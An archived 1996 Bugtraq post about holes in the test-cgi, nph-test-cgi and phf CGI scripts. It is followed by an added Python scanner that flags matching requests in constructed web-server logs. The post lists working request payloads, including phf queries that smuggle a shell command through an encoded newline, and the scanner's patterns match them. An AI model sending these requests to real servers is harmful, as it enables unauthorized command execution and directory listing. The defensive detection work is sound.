Bugtraq mailing list archives
[nph]test-cgi
From: hobbit () avian org (*Hobbit*)
Date: Fri, 13 Dec 1996 00:36:00 CST
Interesting how many people are suddenly coming out of the woodwork as though test-cgi was a new problem. With minor variants, both scripts are a problem in a couple of areas. Crank each of these plus a couple of newlines into your server and see what you get:

    GET /cgi-bin/test-cgi?* HTTP/1.0
    GET /cgi-bin/test-cgi?x *
    GET /cgi-bin/nph-test-cgi?* HTTP/1.0
    GET /cgi-bin/nph-test-cgi?x *

not to mention

    GET /cgi-bin/phf?Q=x%0apwd
    GET /cgi-bin/phf?Q=x%ffpwd

then NUKE everything in that cgi-bin dir and replace what you need with well-written standalone PROGRAMS that start by mistrusting their environment.

_H*
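
A log check for the requests listed in the post, as an added example that is not part of the original message: it flags Common Log Format entries that reach test-cgi, nph-test-cgi or phf with the wildcard or encoded-byte patterns shown. The log lines, addresses and function names are constructed for illustration.

```python
import re

# Quoted request field of a Common Log Format entry: method, target, and an
# optional remainder (normally the protocol, e.g. HTTP/1.0).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>[^\s"]+)(?: (?P<rest>[^"]*))?"')

# Script paths named in the post.
SCRIPTS = ("/cgi-bin/test-cgi", "/cgi-bin/nph-test-cgi", "/cgi-bin/phf")

def classify(line):
    """Return a reason string if the entry matches a request from the post, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if path not in SCRIPTS:
        return None
    rest = m.group("rest") or ""
    if path.endswith("test-cgi"):          # covers test-cgi and nph-test-cgi
        if "*" in query:
            return "wildcard in query string"
        if "*" in rest:
            return "wildcard in protocol field"
    else:                                  # phf
        q = query.lower()                  # percent-escapes are case-insensitive
        if "%0a" in q:
            return "encoded newline (%0a) in phf query"
        if "%ff" in q:
            return "encoded 0xff byte (%ff) in phf query"
    return None

def scan(lines):
    """Return (line_number, reason) for every flagged entry."""
    return [(n, r) for n, r in ((i, classify(l)) for i, l in enumerate(lines, 1)) if r]

# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Dec/1996:00:40:01 -0600] "GET /cgi-bin/test-cgi?* HTTP/1.0" 200 512',
    '192.0.2.10 - - [13/Dec/1996:00:40:02 -0600] "GET /cgi-bin/nph-test-cgi?x *" 200 498',
    '192.0.2.11 - - [13/Dec/1996:00:41:10 -0600] "GET /cgi-bin/phf?Q=x%0Apwd" 200 90',
    '192.0.2.11 - - [13/Dec/1996:00:41:12 -0600] "GET /cgi-bin/phf?Q=x%ffpwd" 200 90',
    '192.0.2.12 - - [13/Dec/1996:00:42:00 -0600] "GET /cgi-bin/test-cgi?name=value HTTP/1.0" 200 300',
    '192.0.2.12 - - [13/Dec/1996:00:42:05 -0600] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for lineno, reason in scan(SAMPLE_LOG):
        print(f"line {lineno}: {reason}")
```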